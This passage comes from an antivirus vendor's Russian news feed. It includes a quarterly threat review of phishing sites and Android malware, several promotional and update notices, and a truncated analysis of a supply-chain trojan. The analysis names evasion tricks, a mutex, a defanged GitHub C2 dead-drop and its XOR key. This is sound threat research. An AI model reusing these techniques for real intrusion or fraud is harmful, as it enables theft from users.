&lt;p&gt;После заполнения формы и нажатия кнопки «Оформить карту «МИР» посетители перенаправлялись на легитимный веб-сайт одного из банков, где им действительно предоставлялась возможность заказать выпуск новой карты. Однако подобные заявки на самом деле никак не были связаны с получением обещанного мошенниками пособия. Злоумышленники обманом побуждали потенциальных жертв оформлять банковские карты, чтобы в рамках партнерской программы с кредитными организациями получать вознаграждение за каждое успешное привлечение клиентов. Никаких выплат от Центра занятости пользователи в итоге не получали. Более того, персональные данные, собранные через поддельные сайты платформы «Работа в России», киберпреступники могли в дальнейшем применять в других мошеннических схемах или продавать на черном рынке.&lt;/p&gt;

&lt;p&gt;Конфиденциальные данные для доступа к учетным записям онлайн-банка, включая логины, пароли и реквизиты карт, остаются желанной целью для киберпреступников. В III квартале наши эксперты зафиксировали новые фишинговые сайты, созданные с целью кражи такой информации. Некоторые из них имитировали интернет-портал одной из российских кредитных организаций и обещали подарки в рамках «масштабной акции к юбилею» компании. Пользователи якобы могли получить гарантированный бонус — от 5 тыс. рублей до удвоения всех средств на счете:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/37_fake_bank_gift1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/37_fake_bank_gift1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт банка обещает подарки в честь юбилея кредитной организации&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Потенциальной жертве предлагалось пройти небольшой опрос. После ответов на вопросы ей якобы становился доступен «гарантированный приз»:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/38_fake_bank_gift2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/38_fake_bank_gift2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Фишинговый сайт благодарит пользователя за ответы и сообщает, что его аккаунт «готов к участию в акции». Для того чтобы «узнать гарантированный приз», потенциальной жертве предлагается нажать кнопку «Получить вознаграждение» (на приведенном скриншоте видно, что мошенники допустили опечатку)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После того как пользователь нажимал кнопку «получения» награды, сайт демонстрировал форму для ввода имени и фамилии, номера мобильного телефона и номера банковской карты:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/39_fake_bank_gift3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/39_fake_bank_gift3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт информирует, что пользователь якобы получил в подарок удвоение средств на счете, и для «получения» денег требуется ввести определенные персональные данные&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После ввода данных сайт запрашивал проверочный код из СМС, необходимый «для зачисления средств на счет». На самом деле это был код подтверждения входа в интернет-банк жертвы, который мошенники выполняли с использованием данных, полученных на предыдущем шаге. Если жертва вводила этот код, злоумышленники получали доступ к ее банковским счетам и картам и могли украсть деньги.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/40_fake_bank_gift4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/40_fake_bank_gift4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пользователя просят указать проверочный код из СМС «для зачисления средств на счет»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Актуальной угрозой остаются поддельные платформы для онлайн-общения и знакомств, с помощью которых злоумышленники стремятся заполучить персональные данные и деньги пользователей. В течение III квартала интернет-аналитики «Доктор Веб» выявили множество подобных сайтов. В одной из распространенных схем мошенники обманом побуждают потенциальных жертв оплатить премиум-подписку, которая якобы активирует аккаунт и открывает доступ к полной функциональности сервиса, включая возможность отправлять сообщения. При этом требуемый платеж — не разовый: обязательным условием «доступа» к чатам является согласие на автоматическое продление услуги. Добиваясь согласия на регулярный платеж, злоумышленники рассчитывают, что жертвы забудут о подключенной подписке, либо по той или иной причине не смогут ее отменить.&lt;/p&gt;

&lt;p&gt;В рамках мошеннической схемы потенциальные жертвы через цепочку веб-перенаправлений (например, при посещении других интернет-ресурсов) могут оказаться на промежуточных сайтах, которые рекламируют тот или иной сервис онлайн-знакомств. Посетителям предлагается пройти опрос для определения «совместимости» с потенциальными партнерами, после чего предоставляется форма регистрации. В ней запрашиваются имя пользователя, пароль и адрес электронной почты. Затем происходит перенаправление непосредственно на сайт «платформы» онлайн-знакомств.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/41_fake_date1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/41_fake_date1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт из мошеннической цепочки «проверяет» потенциальную жертву на совместимость с другими пользователями&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Практически сразу пользователи начинают получать от «заинтересованных» участников сообщения, которые на самом деле запрограммированы и не исходят от реальных людей. В то же время ответить на эти сообщения нельзя — для «продолжения общения» сайт предлагает активировать аккаунт, оплатив премиум-доступ и согласившись на автоматическое продление подписки каждые 30 дней:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/42_fake_date2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/42_fake_date2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;При оплате «премиум-подписки» такие веб-сайты могут демонстрировать незащищенную форму для ввода реквизитов банковской карты — ее номера, срока действия и даже трехзначного защитного кода. Форма не привязана к надежным платежным шлюзам, поэтому пользователи рискуют не только подписаться на дорогостоящую услугу, но и вовсе потерять все деньги на карте, передав информацию о ней неизвестной стороне.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/43_fake_date3_pay_subscr.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/43_fake_date3_pay_subscr.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Данные банковской карты запрашиваются через незащищенную форму ввода&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Если пользователи пытаются отменить подписку или вернуть ранее уплаченные за нее средства, сайты повторно запрашивают данные банковской карты (например, просят указать срок ее действия и часть номера). Это также происходит вне контура защищенных платежных шлюзов, что создает дополнительные риски утечки конфиденциальных данных и кражи средств.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/44_fake_date4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/44_fake_date4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;При запросе на отключение платной подписки сайт просит указать первые 6 цифр и последние 4 цифры номера банковской карты, а также срок ее действия&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb.ru/dangerous_urls/"&gt;Узнайте больше о нерекомендуемых антивирусом Dr.Web сайтах&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Вредоносное и нежелательное ПО для мобильных устройств&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в III квартале 2026 года самыми активными вредоносными программами стали трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, с помощью которых через устройства жертв перенаправляется сетевой трафик киберпреступников. Наиболее часто пользователи сталкивались с модификациями &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.60.origin&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.61.origin&lt;/b&gt; — в общей сложности на них пришлась почти четверть детектирований вредоносного ПО. По сравнению со II кварталом возросло число атак банковских троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. При этом продолжилась тенденция к снижению активности рекламных троянских приложений &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Самыми распространенными нежелательными программами вновь стали поддельные антивирусы &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, предлагающие купить полную версию для лечения якобы найденных угроз. Среди рекламного ПО наиболее часто встречались приложения со встроенными в них модулями &lt;a href="https://vms.drweb.ru/search/?q=Adware.AdPush&amp;lng=ru"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Adware.Airpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;, которые демонстрируют рекламные уведомления, а также программы &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Последние распространяются под видом ПО с читами для игр, но их единственная функция — загрузка сайтов с объявлениями.&lt;/p&gt;

&lt;p&gt;Приложения, в которые при помощи хакерских инструментов для моддинга NP Manager добавлен мусорный код (детектируются как &lt;a href="https://vms.drweb.ru/search/?q=Tool.Obfuscator.TrashCode&amp;lng=ru"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;), остались наиболее часто встречающимся потенциально опасным ПО. Вирусописатели продолжают использовать подобную модификацию для защиты вредоносных программ, в частности, банковских троянов, от обнаружения антивирусами. По-прежнему распространены и другие моды, созданные с использованием NP Manager и детектируемые Dr.Web как &lt;a href="https://vms.drweb.ru/search/?q=Tool.NPMod&amp;lng=ru"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;. Например, в них может применяться обфускация кода — также для защиты от детектирования и анализа. Среди наиболее часто встречавшегося потенциально опасного ПО в III квартале также были программы, модифицированные при помощи утилиты &lt;a href="https://vms.drweb.ru/search/?q=Tool.LuckyPatcher&amp;lng=ru"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Этот инструмент скачивает из интернета скрипты, которые потенциально могут быть вредоносными.&lt;/p&gt;

&lt;p&gt;За минувшие 3 месяца вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play более 50 вредоносных приложений. Среди них были десятки троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, подписывающих жертв на платные услуги. Наши специалисты выяснили, что некоторые новые версии вредоносных приложений этого семейства получили новую функциональность, позволяющую им использовать зараженные устройства в качестве выходных узлов прокси-ботнета для перенаправления интернет-трафика атакующих. Также в Google Play распространялись очередные трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые киберпреступники используют в различных мошеннических схемах.&lt;/p&gt;

&lt;p&gt;Наиболее заметные события, связанные с «мобильной» безопасностью в III квартале&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;Отмечалась высокая активность троянских программ &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, позволяющих перенаправлять сетевой трафик злоумышленников через зараженные устройства.&lt;/li&gt;
    &lt;li&gt;Увеличилось число атак со стороны банковских троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
    &lt;li&gt;Продолжилось снижение активности рекламных троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
    &lt;li&gt;Вирусописатели добавили вредоносным приложениям &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; функциональность, позволяющую превращать зараженные устройства в выходные узлы прокси-ботнета.&lt;/li&gt;
    &lt;li&gt;Через каталог Google Play вновь распространялись вредоносные приложения.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Более подробно о вирусной обстановке для мобильных устройств в III квартале 2026 года читайте в &lt;a href="https://news.drweb.ru/show/review/?i=15305" target="_blank"&gt;нашем обзоре&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15298&amp;lng=ru</guid><title>Кибербезопасность на отлично! Скидки до 25% на комбо-защиту компьютеров и смартфонов, а также розыгрыш книг</title><link>https://news.drweb.ru/show/?i=15298&amp;lng=ru&amp;c=5</link><pubDate>Wed, 26 Aug 2026 13:16:15 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Современная учеба в школе и университете невозможна без использования интернета. Чтобы родители были спокойны за цифровую безопасность своих детей во время учебного года, «Доктор Веб» проводит специальную акцию ко Дню знаний.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;С 26 августа по 2 сентября&lt;/strong&gt; при покупке лицензии на комбо-защиту для компьютеров и мобильных устройств на 1 или 2 года, вы получите скидку 20 или 25%.&amp;nbsp;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;«Киберученик»: 1 ПК + 1 мобильное устройство. &lt;strong&gt;Цена за год — 1 931,20 р.&lt;/strong&gt; вместо 2&amp;nbsp;414 р. (−20%);&lt;/li&gt;&lt;li&gt;«Цифровая защита для всей семьи»: от 4 до 10 устройств. &lt;strong&gt;Цена за год — от 1 871,25 р.&lt;/strong&gt; вместо 2 495 р. (−25%);&lt;/li&gt;&lt;li&gt;«Студент Pro»: 1 ПК + 2 мобильных устройства. &lt;strong&gt;Цена за год &amp;nbsp;— 1 949,60 р.&lt;/strong&gt; вместо 2 437 р. (−20%).&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Каждый оплаченный заказ, сделанный в этот период акции, автоматически участвует &lt;strong&gt;в розыгрыше захватывающего детектива «Ловушка для кибердвоечника»&lt;/strong&gt;, который расскажет подросткам о важности цифровой гигиены.&lt;/p&gt;&lt;p&gt;&lt;a class="btn" href="https://www.drweb.ru/landing/promo_1september2026?utm_source=drweb&amp;amp;utm_medium=news&amp;amp;utm_campaign=school2026"&gt;Участвовать&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Дополнительная регистрация для участия не требуется. Итоги будут опубликованы 7 сентября на &lt;a href="https://www.drweb.ru/landing/promo_1september2026?utm_source=drweb&amp;amp;utm_medium=news&amp;amp;utm_campaign=school2026"&gt;странице акции&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Внимание! &lt;/strong&gt;Скидка действует только на новые лицензии и не суммируется с другими акционными предложениями «Доктор Веб».&lt;a href="https://f2.drweb.com/get+meta+file/?k=310168180efcc4db411c0a201211e15b&amp;amp;sdl=ru&amp;amp;sdf=t"&gt; Полные условия акции.&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Подарите своему ребенку цифровую защиту на весь учебный год!&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15297&amp;lng=ru</guid><title>Сертифицирована новая версия Dr.Web Mobile Security Suite (Аврора)</title><link>https://news.drweb.ru/show/?i=15297&amp;lng=ru&amp;c=5</link><pubDate>Mon, 24 Aug 2026 10:11:47 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;a href="https://products.drweb.ru/mobile/biz/"&gt;Dr.Web Mobile Security Suite&lt;/a&gt; для ОС Аврора версии 3.3 соответствует требованиям ФСБ России к программным антивирусным средствам класса Д, используемым в средствах вычислительной техники, эксплуатируемых в органах федеральной службы безопасности, и может применяться для защиты информации, в том числе содержащей сведения, составляющие государственную тайну.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://company.drweb.ru/licenses_and_certificates/fsb/"&gt;Сертифицированная версия&lt;/a&gt; Dr.Web Mobile Security Suite для ОС Аврора обеспечивает комплексную защиту смартфонов и планшетов от всех типов вредоносных программ, используя все доступные возможности операционной системы. ОС Аврора применяется в крупных государственных компаниях и организациях, относится к доверенным операционным системам и обеспечивает полный контроль над мобильными устройствами и хранящимися на них данными.&lt;/p&gt;&lt;p&gt;Напоминаем пользователям сертифицированной версии о необходимости обновить программное обеспечение после истечения срока действия сертификата.&lt;/p&gt;&lt;p&gt;По вопросам приобретения продуктов Dr.Web обращайтесь к партнерам или специалистам &lt;a href="https://support.drweb.ru/"&gt;Службы поддержки продаж&lt;/a&gt; компании «Доктор Веб».&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15290&amp;lng=ru</guid><title>Лето с Dr.Web: скидка 15% и розыгрыш призов</title><link>https://news.drweb.ru/show/?i=15290&amp;lng=ru&amp;c=5</link><pubDate>Mon, 03 Aug 2026 14:38:32 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Лето — время отдыхать, а не переживать о безопасности своих устройств. Чтобы отдыху ничего не мешало, «Доктор Веб» проводит специальную летнюю акцию.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;С 3 по 7 августа дарим скидку 15% на лицензии &lt;strong&gt;Dr.Web Security Space &lt;/strong&gt;и &lt;strong&gt;Dr.Web Security Space для мобильных устройств &lt;/strong&gt;сроком на 2 или 3 года.&lt;/p&gt;&lt;p&gt;Покупайте защиту и автоматически участвуйте в розыгрыше:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Сертификаты Ozon (номиналом от 2 000 ₽ до 3 500 ₽);&lt;/li&gt;&lt;li&gt;Фирменный мерч Dr.Web.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Дополнительная регистрация для участия не требуется. Итоги подведем 12 августа на странице акции.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;a class="btn" href="https://www.drweb.ru/landing/promo_august2026?utm_source=drweb&amp;amp;utm_medium=news&amp;amp;utm_campaign=august2026&amp;amp;utm_content=news_promo"&gt;Участвовать&lt;/a&gt;&lt;/p&gt;&lt;figure class="image"&gt;&lt;img src="https://st.drweb.com/static/f2_admin/1-600.png"&gt;&lt;/figure&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15291&amp;lng=ru</guid><title>Обновление сервера централизованного управления для Dr.Web Enterprise Security Suite и Dr.Web Industrial</title><link>https://news.drweb.ru/show/?i=15291&amp;lng=ru&amp;c=5</link><pubDate>Thu, 23 Jul 2026 17:12:09 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» выпускает обновление для сервера в составе Dr.Web Enterprise Security Suite и Dr.Web Industrial версии 13.0.1.202606110. Новая версия станет доступна для загрузки с 27 июля 2026 года через веб-интерфейс консоли управления.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Что дает новое обновление&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;В первую очередь релиз направлен на повышение стабильности работы Центра управления и исправление ряда ошибок, выявленных в предыдущей версии. В частности, устранены проблемы с отображением дочерних элементов при фильтрации в дереве антивирусной сети, исправлены ошибки в отправке оповещений администраторам и генерации отчетов. Полный перечень изменений доступен в &lt;a href="https://news.drweb.ru/changelog/"&gt;Changelog&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Влияние на агенты (в том числе в Dr.Web Industrial)&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Обновление сервера не затрагивает работу агентов на защищаемых узлах. Процесс обновления серверного компонента не требует перезагрузки или перенастройки агентского ПО - они продолжат функционировать в штатном режиме. Для промышленных сред, где применяется Dr.Web Industrial, это означает отсутствие каких-либо изменений в работе агентов, так как все исправления относятся исключительно к серверной части и интерфейсу управления.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Важно: &lt;/strong&gt;Сервер Dr.Web будет автоматически перезапущен во время установки обновлений. Рекомендуем запланировать процедуру заранее на время наименьшей нагрузки.&lt;/p&gt;&lt;p&gt;Напоминаем, что своевременное обновление критически важно для поддержания необходимого уровня защиты и оптимальной функциональности ПО.&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15284&amp;lng=ru</guid><title>Обновление компонента антиспам в Dr.Web Enterprise Security Suite и в Dr.Web по подписке</title><link>https://news.drweb.ru/show/?i=15284&amp;lng=ru&amp;c=5</link><pubDate>Wed, 15 Jul 2026 10:45:04 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» выпускает обновление модуля антиспам 1.1.2.202604160 в составе Dr.Web Enterprise Security Suite и Dr.Web по подписке. Его можно будет загрузить с 20 июля 2026 года.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Модуль в режиме реального времени проверяет почтовый трафик и анализирует составные части электронных писем: заголовок, тело, гиперссылки, вложения. Работа компонента сбалансирована и не замедляет производительность почтового клиента.&lt;/p&gt;&lt;p&gt;В новой версии улучшено обнаружение спама и разбор ссылок, а также внесены внутренние изменения. Ранее было выпущено &lt;a href="https://news.drweb.ru/show/?i=14979&amp;amp;lng=ru"&gt;масштабное обновление&lt;/a&gt;, которое повысило эффективность распознавания и фильтрации нежелательного трафика.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Обращаем внимание пользователей Windows XP.&lt;/strong&gt; Если у вас включена опция обновления только антивирусных баз, плагин Dr.Web для Microsoft Outlook будет работать некорректно: все входящие письма будут детектироваться как спам. Как это проверить: в настройках программы выбрать пункт «Обновление», затем нажать «Дополнительные настройки» и зайти в раздел «Обновляемые компоненты».&lt;/p&gt;&lt;p&gt;Рекомендуем пользователям этой операционной системы обновить ОС до более поздних версий или включить в настройках обновление всех модулей программы, а не только вирусных баз.&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15276&amp;lng=ru</guid><title>Цель – разработчики. Новый троян атакует цепочки поставок и наносит комбинированный ущерб зараженным ПК</title><link>https://news.drweb.ru/show/?i=15276&amp;lng=ru&amp;c=5</link><pubDate>Fri, 10 Jul 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Объектом исследования специалистов антивирусной лаборатории стала новая троянская программа. Она представляет собой угрозу типа supply chain attack, т.&amp;nbsp;е. атака на цепочки поставок. Отличительная черта этого ВПО&amp;nbsp;— фокус на проекты, созданные на языке программирования С++ и C#. Еще одна особенность&amp;nbsp;— повышенная опасность. Троян объединяет в себе ряд поражающих факторов, одновременно выполняя несколько функций: стилера, клиппера, бэкдора, майнера и источника заражения файлов.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Первые случаи распространения трояна были зафиксированы в последнем квартале 2025 года, с тех пор он постоянно модифицируется разработчиками. В основном он распространяется по интернету через зараженные .exe и python файлы. Процесс заражения многоступенчатый, разберем протекание каждой стадии и их цели одну за другой.&lt;/p&gt;&lt;h3&gt;Стадия 1. Trojan.DownLoader49.35384&lt;/h3&gt;&lt;p&gt;Специалисты «Доктор Веб» обнаружили множество зараженных легитимных приложений с похожей структурой. В изначальный исполняемый файл добавлен глобальный объект, а выполнение троянизированного приложения начинается с получения доступа к системным API через метод PEB walking. Далее стандартная функция initterm проходит таблицу указателей функций и инициализирует их, где одна из таких функций является вредоносной и запускает PowerShell команду. В некоторых версиях трояна эта нагрузка хранится в зашифрованном виде.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Запуск через initterm&lt;/i&gt;&lt;/p&gt;&lt;p&gt;PowerShell команда скачивает и выполняет вредоносный файл&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader49.35687&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, что означает запуск второй стадии.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Вредоносная PowerShell команда&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В дополнение к исполняемым файлам были обнаружены файлы на языке Python (&lt;strong&gt;Python.Downloader.255&lt;/strong&gt;). В них тот же вредоносный код был зашифрован с помощью механизма симметричного шифрования Fernet. Он спрятан за простой обфускацией — множеством пробелов в первой строке. В этом случае выполнение также проходит в несколько этапов.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Вредоносные Python файлы&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Стадия 2. Trojan.DownLoader49.35687&lt;/h3&gt;&lt;p&gt;На этом этапе троян&amp;nbsp;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader49.35687&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;выполняет проверку своего запуска в песочнице. Кроме этого, он создает объект синхронизации mutex c именем Global\PFNMX (фиксированное значение). Пример подобного объекта: &lt;span class="string"&gt;\Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008&lt;/span&gt;. Таким образом троян проверяет, не запущена ли ранее на компьютере другая копия.&lt;/p&gt;&lt;p&gt;Во время второй стадии троян пытается получить адреса C2 сервера с помощью публичных репозиториев GitHub и игровой платформы Steam. На них злоумышленники оставляют домены, которые троян считывает и использует как URL для загрузки третьей стадии — трояна &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Аккаунты Steam, созданные злоумышленниками, содержат название домена в открытом виде.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Аккаунт Steam с C2 доменом&lt;/i&gt;&lt;/p&gt;&lt;p&gt;На GitHub злоумышленники сохранили зашифрованный адрес C2 домена в виде raw файла: &lt;span class="string"&gt;raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine&lt;/span&gt;. Троян загружает этот файл и расшифровывает его сначала через Base64, а затем с помощью операции XOR с ключом ZwFlushKey.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Зашифрованные домены&lt;/i&gt;&lt;/p&gt;&lt;p&gt;После скачивания следующей стадии,&amp;nbsp;&lt;a 